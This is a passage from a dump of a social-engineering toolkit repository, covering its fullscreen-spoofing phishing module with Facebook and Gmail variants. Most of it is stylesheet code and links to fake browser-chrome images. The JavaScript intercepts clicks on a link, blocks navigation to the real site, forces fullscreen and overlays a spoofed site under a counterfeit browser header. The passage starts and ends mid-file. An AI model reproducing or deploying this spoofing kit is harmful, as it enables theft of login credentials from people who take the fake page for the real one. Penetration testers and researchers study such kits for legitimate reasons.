License Key Administrator,upd,IBFS32.DLL 17 | Microsoft RDP,rdp,ieframe.dll 18 | -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/css/facebox.css: -------------------------------------------------------------------------------- 1 | #facebox { 2 | position: absolute; 3 | top: 0; 4 | left: 0; 5 | z-index: 100; 6 | text-align: left; 7 | } 8 | 9 | 10 | #facebox .popup{ 11 | position:relative; 12 | border:3px solid rgba(0,0,0,0); 13 | -webkit-border-radius:5px; 14 | -moz-border-radius:5px; 15 | border-radius:5px; 16 | -webkit-box-shadow:0 0 18px rgba(0,0,0,0.4); 17 | -moz-box-shadow:0 0 18px rgba(0,0,0,0.4); 18 | box-shadow:0 0 18px rgba(0,0,0,0.4); 19 | } 20 | 21 | #facebox .content { 22 | display:table; 23 | width: 370px; 24 | padding: 10px; 25 | background: #fff; 26 | -webkit-border-radius:4px; 27 | -moz-border-radius:4px; 28 | border-radius:4px; 29 | } 30 | 31 | #facebox .content > p:first-child{ 32 | margin-top:0; 33 | } 34 | #facebox .content > p:last-child{ 35 | margin-bottom:0; 36 | } 37 | 38 | #facebox .close{ 39 | position:absolute; 40 | top:5px; 41 | right:5px; 42 | padding:2px; 43 | background:#fff; 44 | } 45 | #facebox .close img{ 46 | opacity:0.3; 47 | } 48 | #facebox .close:hover img{ 49 | opacity:1.0; 50 | } 51 | 52 | #facebox .loading { 53 | text-align: center; 54 | } 55 | 56 | #facebox .image { 57 | text-align: center; 58 | } 59 | 60 | #facebox img { 61 | border: 0; 62 | margin: 0; 63 | } 64 | 65 | #facebox_overlay { 66 | position: fixed; 67 | top: 0px; 68 | left: 0px; 69 | height:100%; 70 | width:100%; 71 | } 72 | 73 | .facebox_hide { 74 | z-index:-100; 75 | } 76 | 77 | .facebox_overlayBG { 78 | background-color: #000; 79 | z-index: 99; 80 | } -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-bg.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-left.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-linux-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-right.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-center.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-right.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-center.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-right.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-osx-safari-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-bg.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/browser-windows-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/facebox/closelabel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/facebox/closelabel.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/facebox/loading.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/facebox/loading.gif -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/fb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/fb.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/flogin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/flogin.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-chrome-left.png -------------------------------------------------------------------------------- 
/src/webattack/fsattack/FACEBOOK/img/menu-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/img/menu-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/FACEBOOK/img/menu-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/FACEBOOK/js/libs/browser-detect.js: -------------------------------------------------------------------------------- 1 | var BrowserDetect = { 2 | init: function () { 3 | this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 4 | this.version = this.searchVersion(navigator.userAgent) 5 | || this.searchVersion(navigator.appVersion) 6 | || "an unknown version"; 7 | this.OS = this.searchString(this.dataOS) || "an unknown OS"; 8 | }, 9 | searchString: function (data) { 10 | for (var i=0;idemo will still work but you will see Chrome's UI instead of your own browser's UI."); 42 | } 43 | 44 | // OS detect 45 | if 
(BrowserDetect.OS == "Mac") { 46 | $('html').addClass('osx'); 47 | } else if (BrowserDetect.OS == "Windows") { 48 | $('html').addClass('windows'); 49 | } else if (BrowserDetect.OS == "Linux") { 50 | $('html').addClass('linux'); 51 | } else { 52 | errors.push("You're not using an Windows, Mac OS X, or Linux. The demo will not work on your OS."); 53 | } 54 | 55 | } else { 56 | errors.push("Your browser does not support the Fullscreen API. Sorry - this demo will not work for you. Try Chrome, Firefox, or Safari 6 (on OS X 10.8 Mountain Lion)."); 57 | } 58 | 59 | // Errors? 60 | if (errors.length) { 61 | $.each(errors, function(i, error) { 62 | errorStr += error; 63 | if (i != errors.length - 1) { 64 | errorStr += "

"; 65 | } 66 | }); 67 | } 68 | 69 | // Set class on html element that represents the fullscreen state 70 | $(document).on('fullscreenchange', function(test) { 71 | if (document.fullscreenEnabled) { 72 | $('html').addClass('fullscreened').removeClass('not-fullscreened'); 73 | } else { 74 | $('html').addClass('not-fullscreened').removeClass('fullscreened'); 75 | $('html').off('click.spoof'); 76 | } 77 | }); 78 | $(document).trigger('fullscreenchange'); 79 | 80 | // Handle click on target link 81 | $('html').on('click', '.spoofLink', function(e) { 82 | 83 | // Prevent navigation to legit link 84 | e.preventDefault(); 85 | e.stopPropagation(); 86 | 87 | // Show error if browser doesn't support fullscreen 88 | if (!window.fullscreenSupport) { 89 | $.facebox(errorStr); 90 | return; 91 | } 92 | 93 | // Trigger fullscreen 94 | requestFullScreen(); 95 | 96 | // Set target site to proper height, based on window size 97 | $('#spoofSite').css({ 98 | top: $('#spoofHeader').height(), 99 | height: $(window).height() 100 | }); 101 | 102 | 103 | 104 | // Callout when the user clicks on something from fake UI 105 | $('html').on('click.spoof', function() { 106 | // $('#spoofHeader').stop().effect('', function() { 107 | //$.facebox({div: '#phished'}); 108 | // }); 109 | 110 | }); 111 | }); 112 | 113 | }); 114 | 115 | -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/css/facebox.css: -------------------------------------------------------------------------------- 1 | #facebox { 2 | position: absolute; 3 | top: 0; 4 | left: 0; 5 | z-index: 100; 6 | text-align: left; 7 | } 8 | 9 | 10 | #facebox .popup{ 11 | position:relative; 12 | border:3px solid rgba(0,0,0,0); 13 | -webkit-border-radius:5px; 14 | -moz-border-radius:5px; 15 | border-radius:5px; 16 | -webkit-box-shadow:0 0 18px rgba(0,0,0,0.4); 17 | -moz-box-shadow:0 0 18px rgba(0,0,0,0.4); 18 | box-shadow:0 0 18px rgba(0,0,0,0.4); 19 | } 20 | 21 | #facebox .content { 22 | 
display:table; 23 | width: 370px; 24 | padding: 10px; 25 | background: #fff; 26 | -webkit-border-radius:4px; 27 | -moz-border-radius:4px; 28 | border-radius:4px; 29 | } 30 | 31 | #facebox .content > p:first-child{ 32 | margin-top:0; 33 | } 34 | #facebox .content > p:last-child{ 35 | margin-bottom:0; 36 | } 37 | 38 | #facebox .close{ 39 | position:absolute; 40 | top:5px; 41 | right:5px; 42 | padding:2px; 43 | background:#fff; 44 | } 45 | #facebox .close img{ 46 | opacity:0.3; 47 | } 48 | #facebox .close:hover img{ 49 | opacity:1.0; 50 | } 51 | 52 | #facebox .loading { 53 | text-align: center; 54 | } 55 | 56 | #facebox .image { 57 | text-align: center; 58 | } 59 | 60 | #facebox img { 61 | border: 0; 62 | margin: 0; 63 | } 64 | 65 | #facebox_overlay { 66 | position: fixed; 67 | top: 0px; 68 | left: 0px; 69 | height:100%; 70 | width:100%; 71 | } 72 | 73 | .facebox_hide { 74 | z-index:-100; 75 | } 76 | 77 | .facebox_overlayBG { 78 | background-color: #000; 79 | z-index: 99; 80 | } -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-left.png -------------------------------------------------------------------------------- 
/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-linux-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-linux-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-chrome-bg.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-center.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-firefox-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-center.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-center.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-osx-safari-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-osx-safari-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-chrome-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-chrome-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-chrome-left.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-chrome-right.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-chrome-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-firefox-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-firefox-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/browser-windows-firefox-right.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/browser-windows-firefox-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/facebox/closelabel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/facebox/closelabel.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/facebox/loading.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/facebox/loading.gif -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/glogin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/glogin.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/gmail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/gmail.png -------------------------------------------------------------------------------- 
/src/webattack/fsattack/GMAIL/img/lgmail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/lgmail.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-bg.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-chrome-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-chrome-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-firefox-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-firefox-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-right.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-right.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/img/menu-osx-safari-left.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/webattack/fsattack/GMAIL/img/menu-osx-safari-left.png -------------------------------------------------------------------------------- /src/webattack/fsattack/GMAIL/js/libs/browser-detect.js: -------------------------------------------------------------------------------- 1 | var BrowserDetect = { 2 | init: function () { 3 | this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; 4 | this.version = this.searchVersion(navigator.userAgent) 5 | || this.searchVersion(navigator.appVersion) 6 | || "an unknown version"; 7 | this.OS = this.searchString(this.dataOS) || "an unknown OS"; 8 | }, 9 | searchString: function (data) { 10 | for (var i=0;i\na=new 